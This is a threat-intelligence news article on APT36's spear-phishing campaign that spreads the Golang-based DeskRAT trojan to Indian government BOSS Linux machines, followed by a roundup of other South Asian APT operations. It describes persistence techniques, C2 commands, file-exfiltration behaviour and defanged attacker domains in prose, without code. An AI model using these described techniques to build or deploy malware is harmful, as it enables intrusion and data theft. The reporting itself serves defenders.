Golang-Based DeskRAT Malware Campaign is Used by APT36 to Target the Indian Government

“Indian Government is targeted by APT36 that uses Golang-Based DeskRAT Malware Campaign.”

A threat actor with ties to Pakistan has been seen launching spear-phishing operations against Indian government organizations in an attempt to spread DeskRAT, a Golang-based malware.

Sekoia saw the activity in August and September of 2025, and it has been linked to Transparent Tribe (also known as APT36), a state-sponsored hacker collective that has been active since at least 2013. Additionally, it expands on a previous campaign that CYFIRMA revealed in August 2025.

Phishing emails with a ZIP file attachment or, occasionally, a link to an archive stored on reputable cloud services like Google Drive are part of the attack chains. The ZIP package contains malicious desktop file embedding commands that, when run alongside the main payload, cause Mozilla Firefox to display a phony PDF (“CDS_Directive_Armed_Forces.pdf”).

The external server “modgovindia[.]com” is used to extract and run both artifacts. Similar to the previous campaign, the remote access trojan may establish command-and-control (C2) over WebSockets, and the campaign is intended to target BOSS (Bharat Operating System Solutions) Linux computers.

Adding the malware to the Linux autostart directory (“$HOME/.config/autostart”), setting up a cron job, creating a systemd service, and configuring bashrc to launch the trojan via a shell script written to the “$HOME/.config/system-backup/” directory are the four persistence strategies supported by the malware.

DeskRAT supports five different commands –

• ping: To send the C2 server a JSON message that includes “pong” and the current timestamp.
• heartbeat: To transmit a timestamp and heartbeat_response in a JSON message.
• browse_files: To transmit listings from directories.
• start_collection: To look for and transfer files that are less than 100 MB in size and match a predetermined list of extensions.
• upload_execute: To drop and run a second Python, shell, or desktop payload.

French Cybersecurity Company

“The C2 servers of DeskRAT are referred to as stealth servers.” “A name server that is not listed in any publicly accessible NS records for the related domain is referred to as a stealth server in this context.” “TransparentTribe has now switched to employing dedicated staging servers, whereas the original attacks used normal cloud storage sites like Google Drive to disseminate malicious payloads.”

The results come after a report from QiAnXin XLab that described how the campaign used phishing emails with booby-trapped Desktop file attachments to target Windows endpoints with a Golang backdoor it tracks as StealthServer, indicating a cross-platform focus.

It’s worth noting that StealthServer for Windows comes in three variants –

• StealthServer Windows-V1 (Observed in July 2025): It uses several anti-analysis and anti-debug strategies to evade detection; it creates persistence through the use of Windows Registry modifications, scheduled tasks, and a PowerShell script placed in the Startup folder; and it communicates with the C2 server via TCP to list files and upload/download particular files.
• StealthServer Windows-V2 (Observed in late August 2025): While maintaining functionality, it includes new anti-debug checks for programs like IDA, x64dbg, and OllyDbg.
• StealthServer Windows-V3 (Observed in late August 2025): It functions similarly to DeskRAT and communicates via WebSocket.

According to XLab, it also noticed two Linux versions of StealthServer, including DeskRAT, which supports the additional command “welcome.” On the other side, HTTP is used for C2 communications rather than WebSocket in the second Linux version.

It features three commands –

• browse: To list all of the files in a given directory.
• upload: To upload a designated file.
• Execute: To run a command in bash.

From the root directory (“/”), it also recursively looks for files that match a set of extensions. It then sends the files it finds in an encrypted manner by sending an HTTP POST request to “modgovindia[.]space:4000.”

This suggests that the Linux version might have been a previous version of DeskRAT, as the latter has a specific “start_collection” command for file exfiltration.

QiAnXin XLab

“A wide range of tools, multiple variations, and a rapid delivery cadence are characteristics of the group’s frequent operations.”

Attacks by Other Threat Clusters in South and East Asia

The development coincides with the recent revelation of many campaigns carried out by threat actors with a South Asian focus.

• A C# implant called “cayote.log” that can collect system information and execute arbitrary executables obtained from an attacker-controlled server was dropped as part of a phishing campaign by Bitter APT that targeted the military, government, and electric power sectors in China and Pakistan using malicious Microsoft Excel attachments or RAR archives that took advantage of CVE-2025-8088.
• As part of a “concentrated” campaign codenamed Operation SouthNet, SideWinder launched a new wave of targeted activity that used credential-harvesting portals and weaponized lure documents that deliver multi-platform malware to the maritime industry as well as other verticals in Pakistan, Sri Lanka, Bangladesh, Nepal, and Myanmar.
• The Havoc post-exploitation architecture is used in assaults against businesses and government agencies in China and other Southeast Asian nations by OceanLotus, a hacker collective with ties to Vietnam (also known as APT-Q-31).
• Using a PowerShell script that drops BabShell (a C++ reverse shell), which then launches MemLoader HidenDesk (a loader that executes a Remcos RAT payload in memory) and MemLoader Edge (another malicious loader that embeds VRat, a variant of the open-source RAT vxRat), Mysterious Elephant (also known as APT-K-47) launched an attack campaign in early 2025 that initially gained access to target government agencies and foreign affairs sectors in Pakistan, Afghanistan, Bangladesh, Nepal, India, and Sri Lanka.

 

Notably, these intrusions have also concentrated on leveraging many modules, such as Uplo Exfiltrator and Stom Exfiltrator, which are dedicated to capturing different data shared through the well-known messaging app, to exfiltrate WhatsApp chats from infiltrated systems.

ChromeStealer Exfiltrator is another tool that the threat actor uses. As the name suggests, it may siphon WhatsApp files and collect cookies, tokens, and other private data from Google Chrome.

The revelation presents a picture of a hacker collective that has developed into a sophisticated threat operation with its own arsenal of unique malware, moving beyond the use of tools from other threat actors.

Origami Elephant, Confucius, and SideWinder are all thought to be acting with Indian interests in mind, and the enemy is known to have tactical overlaps with them.

Kaspersky

“The Asia-Pacific region’s government agencies and foreign affairs sectors are seriously threatened by Mysterious Elephant, a highly skilled and active Advanced Persistent Threat group.”   “The utilization of open-source and custom tools, such as BabShell and MemLoader, demonstrates their technical proficiency and readiness to invest in creating sophisticated malware.”

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”

Read More:

YouTube Video Malware Traps in Massive Ghost Network Operation Expose 3,000 Videos

About Author